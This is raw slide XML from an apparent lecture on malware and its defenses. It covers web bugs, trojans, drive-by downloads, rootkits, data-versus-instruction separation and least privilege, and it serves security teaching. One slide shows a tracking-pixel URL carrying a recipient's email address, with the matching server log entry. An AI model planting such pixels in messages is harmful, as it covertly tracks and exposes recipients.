                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> sende</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> ca</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> determin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> tha</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> th</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> message </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>was opened. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2000" b="1" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="3333CC"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                          <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.exploits.com/pixel.gif?bbrown@spsu.edu</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr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100"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="15"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1100"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="955040">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>168.28.180.3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> [30/Jan/2010:15:02:19]</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="955040">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>"GET/images/pixel.gif?bbrown@spsu.edu</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="020703090202050204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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>34</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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87083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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Social Engineering</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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Spam, phishing and spea</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-60" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r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-phishing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60"/>
                        </a:spcBef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spc="-114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T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rojan</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>H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orse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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="744855" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="3020"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Ofte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n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 “free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”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program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s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lik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e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games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,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wit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h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 malicious additions.</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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lvl="1">
                        <a:lnSpc>
                          <a:spcPts val="700"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="15"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1884045" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Drive-by download:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-15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A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-17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web site installs or attempts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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to install malicious software.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10"/>
                        </a:spcBef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Platforms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 panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Desktops</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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335"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Mobil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e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(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increasing)</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>35</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Rootkits</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1058545" marR="812800" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3240"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1058545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Set of hidden programs installed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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on a system to maintain</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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covert access to that system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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1058545" marR="1015365" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3240"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1058545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Hides by subverting the mechanisms that monitor and report on the processes, files, and registries on a computer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50"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1058545" marR="1669415" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3240"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1058545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Gives administrator</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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(or root) privileges to attacker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50"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1058545" marR="755650" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="3240"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1058545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Can add or change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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programs and files, monitor processes, send and receive</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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network tra</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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fic, and get backdoor access on demand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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>36</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Defenses</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1107440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11074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Distinguish between</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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data, instructions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1107440">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc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(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e.g.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1" spc="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Microsoft</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-165" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="30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Data Execution</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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Prevention)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</a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440" marR="1470660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11074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Limit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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objects accessible</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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to processes (least privilege)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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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Inhibit sharing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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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Detect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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alteration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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of files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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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Detect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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actions beyond specifications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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440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11074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Analyze</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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statistical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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characteristics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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>37</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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71462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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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vs.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Instructions</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Malicious logic is both</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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20"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="2138680" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-145" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>V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irus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: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writte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n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t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o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progra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m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(data)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;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the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n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executes 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(instructions)</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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lvl="1">
                        <a:lnSpc>
                          <a:spcPts val="600"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="45"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="979170" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Approach: treat “data” and “instructions” as separate types, and require certifying authority to approve conversion</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="583565" lvl="1" indent="-285750">
                        <a:lnSpc>
                          <a:spcPts val="2590"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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Key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s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ar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e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assumptio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n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tha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t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certifyin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g</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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authorit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y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wil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l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>not</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="-1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make 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mistake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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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an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d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assumptio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n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tha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t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tools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,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> supporting 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infrastructure</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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used in certifying</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>process are not corrupt</a:t>
                      </a:r>
                      <a:endParaRPr sz="24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20"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1230630" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="302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Example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: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Microsoft</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-155" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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Dat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a 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Executio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n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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P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revention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(DEP)</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>38</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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31838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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Classification</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-20" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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of</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Malware</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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spc="-215" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>w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o broad categories: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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Ho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w 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th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e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malwar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e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propagate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s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(spreads)</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Payloa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d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action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s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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(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wha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t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 i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t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 does)</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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lvl="1">
                        <a:lnSpc>
                          <a:spcPts val="700"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="10"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Secondary classifications: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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Independent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or requiring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-2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a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host</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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0"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204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Replicatin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g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 o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r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 non-replicating</a:t>
                      </a:r>
                      <a:endParaRPr sz="28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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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45427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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Example:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Duff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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and</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Unix</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1772285" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Files with “execute”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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permission have type “executable”;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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those without it, type “data”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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1791970" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="324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Executable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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files can be altered,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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but type is immediately</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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changed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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to “data”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10"/>
                        </a:spcBef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Implemented</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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by turning o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-55" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>f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f execute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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permission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60"/>
                        </a:spcBef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Certifier</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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can change</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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them back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878840">
                        <a:lnSpc>
                          <a:spcPts val="3240"/>
                        </a:lnSpc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So virus can spread only if run as certifier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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>39</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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9960616"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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63715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 panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Limiting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-110" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> 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Accessibility</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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963295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Basis: a user (unknowingly) executes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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malicious logic, which then executes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>w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ith all that use</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="114" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-165" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’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s privileges</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="911860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This is one reason </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000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why one should not normally with an account</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="15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-5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w</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="0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ith administrative</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="30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privileges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.</a:t>
                      </a:r>
